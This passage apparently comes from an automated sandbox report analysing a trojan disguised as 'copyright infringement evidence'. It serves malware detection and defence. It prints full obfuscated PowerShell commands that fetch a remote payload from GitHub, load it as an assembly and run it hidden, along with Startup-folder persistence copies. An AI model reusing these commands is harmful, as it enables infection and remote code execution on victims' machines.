AbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Contains functionality to call native functions
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA4A0 CertEnumCertificatesInStore,NtCreateFile, 0_2_00007FF7A18DA4A0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18745F0 NtCancelIoFileEx,RtlNtStatusToDosError, 0_2_00007FF7A18745F0
Detected potential crypto function
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A178ABFF 0_2_00007FF7A178ABFF
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1781E23 0_2_00007FF7A1781E23
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17A8FE7 0_2_00007FF7A17A8FE7
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C8AB0 0_2_00007FF7A18C8AB0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18D32A0 0_2_00007FF7A18D32A0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A185C2F0 0_2_00007FF7A185C2F0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17D8310 0_2_00007FF7A17D8310
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CFB00 0_2_00007FF7A18CFB00
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17FC310 0_2_00007FF7A17FC310
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17D7230 0_2_00007FF7A17D7230
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1816A40 0_2_00007FF7A1816A40
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C4260 0_2_00007FF7A18C4260
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C81F0 0_2_00007FF7A17C81F0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C2A00 0_2_00007FF7A18C2A00
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C8CA0 0_2_00007FF7A17C8CA0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18234B0 0_2_00007FF7A18234B0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18D14A0 0_2_00007FF7A18D14A0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1784CC5 0_2_00007FF7A1784CC5
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CECC0 0_2_00007FF7A18CECC0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1815CF0 0_2_00007FF7A1815CF0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17CB440 0_2_00007FF7A17CB440
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CA440 0_2_00007FF7A18CA440
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17933B2 0_2_00007FF7A17933B2
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1832370 0_2_00007FF7A1832370
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1789EA0 0_2_00007FF7A1789EA0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C96D0 0_2_00007FF7A18C96D0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A182E650 0_2_00007FF7A182E650
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1816690 0_2_00007FF7A1816690
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1868E90 0_2_00007FF7A1868E90
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CDE80 0_2_00007FF7A18CDE80
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C7E10 0_2_00007FF7A17C7E10
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CE570 0_2_00007FF7A18CE570
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18BF580 0_2_00007FF7A18BF580
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C88E0 0_2_00007FF7A17C88E0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18D8830 0_2_00007FF7A18D8830
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18A6060 0_2_00007FF7A18A6060
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C8070 0_2_00007FF7A17C8070
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CB060 0_2_00007FF7A18CB060
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CBFA0 0_2_00007FF7A18CBFA0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A181AF70 0_2_00007FF7A181AF70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FF83B9B3292 29_2_00007FF83B9B3292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FF83B993292 30_2_00007FF83B993292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 43_2_00007FF83B993292 43_2_00007FF83B993292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B9B3292 45_2_00007FF83B9B3292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 53_2_00007FF83B983292 53_2_00007FF83B983292
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: String function: 00007FF7A18D8F30 appears 121 times
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: String function: 00007FF7A18D9030 appears 104 times
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Yara signature match
Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8824, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@99/86@0/6
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-07 20-15-05-350.log Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
Source: copyright_infringement_evidence_1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: copyright_infringement_evidence_1.exe Virustotal: Detection: 15%
Source: unknown Process created: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQB